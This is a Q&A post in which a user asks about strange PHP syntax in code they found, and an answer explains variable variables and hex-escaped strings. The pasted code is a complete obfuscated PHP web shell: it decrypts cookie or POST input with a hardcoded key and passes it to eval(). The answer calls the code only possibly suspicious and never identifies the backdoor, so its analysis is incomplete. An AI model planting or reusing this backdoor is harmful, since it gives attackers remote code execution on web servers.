What is going on? I have never seen PHP syntax like this: ${"\x47\x4c\x4fB\x41\x4c\x53"}['v9800']

Question

There is some strange syntax in this php code I found:

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $hd701 = 475;$GLOBALS['xbe829'] = Array();global $xbe829;$xbe829 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['v9800'] = "\x7a\x7b\x60\x5b\x4a\x56\x6c\x51\x21\x62\x38\x66\x44\xa\x2e\x27\x22\x50\x58\x45\x49\x3d\x79\x43\x23\x3b\x53\x29\x2a\x30\x6b\x73\x63\x9\x77\x6f\x47\x6a\x4e\x54\x39\x3f\x40\x4f\x35\x4b\x26\x34\x6d\x5d\x76\x3a\x3c\x64\x71\x67\x5e\x5c\x46\x6e\x75\x4c\xd\x42\x65\x52\x48\x70\x41\x68\x55\x2b\x57\x5a\x69\x7c\x20\x2c\x28\x74\x59\x3e\x2f\x37\x78\x33\x31\x7d\x61\x5f\x7e\x72\x2d\x24\x36\x25\x4d\x32";$xbe829[$xbe829['v9800'][32].$xbe829['v9800'][85].$xbe829['v9800'][11].$xbe829['v9800'][11].$xbe829['v9800'][94]] = $xbe829['v9800'][32].$xbe829['v9800'][69].$xbe829['v9800'][91];$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]] = $xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][53];$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]] = $xbe829['v9800'][31].$xbe829['v9800'][79].$xbe829['v9800'][91].$xbe829['v9800'][6].$xbe829['v9800'][64].$xbe829['v9800'][59];$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]] = $xbe829['v9800'][74].$xbe829['v9800'][59].$xbe829['v9800'][74].$xbe829['v9800'][89].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][79];$xbe829[$xbe829['v9800'][11].$xbe829['v9800'][44].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][94].$xbe829['v9800'][44].$xbe829['v9800'][11]] = $xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][74].$xbe829['v9800'][88].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][0].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][64].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][47].$xbe829['v9800'][64].$xbe829['v9800'][11].$xbe829['v9800'][97]] = $xbe829['v9800'][67].$xbe829['v9800'][69].$xbe829['v9800'][67].$xbe829['v9800'][50].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][31].$xbe829['v9800'][74].$xbe829['v9800'][35].$xbe829['v9800'][59];$xbe829[$xbe829['v9800'][0].$xbe829['v9800'][64].$xbe829['v9800'][47].$xbe829['v9800'][94].$xbe829['v9800'][86]] = $xbe829['v9800'][60].$xbe829['v9800'][59].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][74].$xbe829['v9800'][88].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][0].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][48].$xbe829['v9800'][97].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][32]] = $xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][94].$xbe829['v9800'][47].$xbe829['v9800'][89].$xbe829['v9800'][53].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][35].$xbe829['v9800'][53].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][47].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][11]] = $xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][79].$xbe829['v9800'][89].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][64].$xbe829['v9800'][89].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][74].$xbe829['v9800'][79];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][9].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][47]] = $xbe829['v9800'][31].$xbe829['v9800'][32].$xbe829['v9800'][53].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][9];$xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]] = $xbe829['v9800'][69].$xbe829['v9800'][86].$xbe829['v9800'][94].$xbe829['v9800'][86].$xbe829['v9800'][29].$xbe829['v9800'][83];$xbe829[$xbe829['v9800'][88].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][9].$xbe829['v9800'][44].$xbe829['v9800'][88]] = $_POST;$xbe829[$xbe829['v9800'][60].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][86].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][9]] = $_COOKIE;@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][91].$xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][89].$xbe829['v9800'][6].$xbe829['v9800'][35].$xbe829['v9800'][55], NULL);@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][6].$xbe829['v9800'][35].$xbe829['v9800'][55].$xbe829['v9800'][89].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][91].$xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][31], 0);@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][48].$xbe829['v9800'][88].$xbe829['v9800'][84].$xbe829['v9800'][89].$xbe829['v9800'][64].$xbe829['v9800'][84].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][60].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][35].$xbe829['v9800'][59].$xbe829['v9800'][89].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][64], 0);@$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][47].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][11]](0);$x7bb89b70 = NULL;$t0e76b849 = NULL;$xbe829[$xbe829['v9800'][67].$xbe829['v9800'][47].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][40].$xbe829['v9800'][47]] = $xbe829['v9800'][40].$xbe829['v9800'][44].$xbe829['v9800'][88].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][88].$xbe829['v9800'][85].$xbe829['v9800'][83].$xbe829['v9800'][92].$xbe829['v9800'][64].$xbe829['v9800'][53].$xbe829['v9800'][10].$xbe829['v9800'][86].$xbe829['v9800'][92].$xbe829['v9800'][47].$xbe829['v9800'][10].$xbe829['v9800'][47].$xbe829['v9800'][83].$xbe829['v9800'][92].$xbe829['v9800'][40].$xbe829['v9800'][64].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][92].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][94].$xbe829['v9800'][86].$xbe829['v9800'][10].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][53].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][44].$xbe829['v9800'][47];global $p48307594;function  h16107($x7bb89b70, $he719627){global $xbe829;$gea9ce = "";for ($t69c26=0; $t69c26<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($x7bb89b70);){for ($nb3186c8=0; $nb3186c8<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($he719627) && $t69c26<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($x7bb89b70); $nb3186c8++, $t69c26++){$gea9ce .= $xbe829[$xbe829['v9800'][32].$xbe829['v9800'][85].$xbe829['v9800'][11].$xbe829['v9800'][11].$xbe829['v9800'][94]]($xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]]($x7bb89b70[$t69c26]) ^ $xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]]($he719627[$nb3186c8]));}}return $gea9ce;}function  scdbab($x7bb89b70, $he719627){global $xbe829;global $p48307594;return $xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]]($xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]]($x7bb89b70, $p48307594), $he719627);}foreach ($xbe829[$xbe829['v9800'][60].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][86].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][9]] as $he719627=>$y301fc25){$x7bb89b70 = $y301fc25;$t0e76b849 = $he719627;}if (!$x7bb89b70){foreach ($xbe829[$xbe829['v9800'][88].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][9].$xbe829['v9800'][44].$xbe829['v9800'][88]] as $he719627=>$y301fc25){$x7bb89b70 = $y301fc25;$t0e76b849 = $he719627;}}$x7bb89b70 = @$xbe829[$xbe829['v9800'][0].$xbe829['v9800'][64].$xbe829['v9800'][47].$xbe829['v9800'][94].$xbe829['v9800'][86]]($xbe829[$xbe829['v9800'][79].$xbe829['v9800'][9].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][47]]($xbe829[$xbe829['v9800'][48].$xbe829['v9800'][97].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][32]]($x7bb89b70), $t0e76b849));if (isset($x7bb89b70[$xbe829['v9800'][88].$xbe829['v9800'][30]]) && $p48307594==$x7bb89b70[$xbe829['v9800'][88].$xbe829['v9800'][30]]){if ($x7bb89b70[$xbe829['v9800'][88]] == $xbe829['v9800'][74]){$t69c26 = Array($xbe829['v9800'][67].$xbe829['v9800'][50] => @$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][64].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][47].$xbe829['v9800'][64].$xbe829['v9800'][11].$xbe829['v9800'][97]](),$xbe829['v9800'][31].$xbe829['v9800'][50] => $xbe829['v9800'][86].$xbe829['v9800'][14].$xbe829['v9800'][29].$xbe829['v9800'][92].$xbe829['v9800'][86],);echo @$xbe829[$xbe829['v9800'][11].$xbe829['v9800'][44].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][94].$xbe829['v9800'][44].$xbe829['v9800'][11]]($t69c26);}elseif ($x7bb89b70[$xbe829['v9800'][88]] == $xbe829['v9800'][64]){eval/*l551d*/($x7bb89b70[$xbe829['v9800'][53]]);}exit();} ?>

In particular I am very curious, what kind of syntax is this?

${"\x47\x4c\x4fB\x41\x4c\x53"}['v9800']

Answer 1

Firstly, to address the code syntax itself, PHP allows you to dynamically create variable names.

Let's say you have a variable:

$test = 123;

You can dynamically create a reference to this variable like so:

echo ${'test'};  // Prints '123'

Why would you want to do this? Well the example above is pointless, but let's say you need to dynamically run through some variable names at runtime:

$var1 = 'A';
$var2 = 'B';
$var3 = 'C';

for ($i = 1; $i <= 3; $i++) {
    echo ${'var' . $i};
}

// Prints 'ABC'

---

So now that we know what the syntax means, what does \x47\x4c\x4fB\x41\x4c\x53 mean?

The \x is used to escape a hexadecimal character sequence. In simple terms, the string you've shown is a bunch of characters that someone has represented as hexadecimal rather than human readable ASCII characters you are used to seeing.

If we get rid of the \x escape parts, we are left with:

474c4fB414c53

As far as I can tell, the B here is not intended to be hex. This leaves us with:

474c4f 414c53

Which translates to:

GLO ALS

And if we replace the B we get:

GLOBALS

If we add that back in to your dynamic variable reference and look at the code again, we get:

$GLOBALS['v9800']

This is interesting, because $GLOBALS is a special array available in PHP which gives access to all variables in the global scope. So essentially, your code is trying to access a global variable called $v9800.

You will have to decide what that might mean for your application, but it's possible this code is suspicious. It could be that someone has deliberately disguised their code using this cryptic method, to try to access a global variable.